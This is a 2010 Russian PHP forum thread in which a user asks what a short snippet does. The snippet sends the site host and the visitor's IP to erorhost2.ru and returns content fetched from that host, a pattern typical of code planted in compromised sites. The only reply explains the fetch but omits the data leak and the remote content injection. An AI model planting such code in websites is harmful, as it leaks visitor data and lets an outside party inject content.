Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Скриптовые языки программирования > PHP
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 23.02.2010, 19:20   #1
AllForCS
 
Регистрация: 26.10.2009
Сообщений: 8
Вопрос Что делает код

Добрый день, не подскажите что делает этот код

PHP код:
<?php

$fp 
= @fsockopen("erorhost2.ru"80$errno$errstr6);
if (!
$fp)
{
return 
'';
} else
{

$page = @file("http://erorhost2.ru/id1.php?site=" $_SERVER[HTTP_HOST] . "&ip=" .
$_SERVER[REMOTE_ADDR]);
return 
implode(''$page);
}

?>
AllForCS вне форума Ответить с цитированием
Старый 24.02.2010, 00:50   #2
Greblin
Меркантильный кю
Участник клуба
 
Аватар для Greblin
 
Регистрация: 02.02.2008
Сообщений: 1,001
По умолчанию

Открывает сокет, если не удалось открыть (нет соединения с сайтом например), то возвращает пустую строку. Если всё нормально, то возвращает код странички по заданному адресу
Росли вроде умными, выросли дурнями... (c)А.Васильев
Greblin вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Печать. Что делает MS и не делает Delphi Влад12 Общие вопросы Delphi 8 05.05.2010 20:04
Объясните что делает функция Promax2009 Общие вопросы C/C++ 2 11.02.2010 07:37
Подскажите пожалуйста что делает этот код SlashMan JavaScript, Ajax 3 10.01.2010 22:41
Что делает этот код? lucky Общие вопросы Delphi 4 17.06.2009 17:02
Что делает этот while do? Levhik Общие вопросы C/C++ 4 25.01.2009 17:27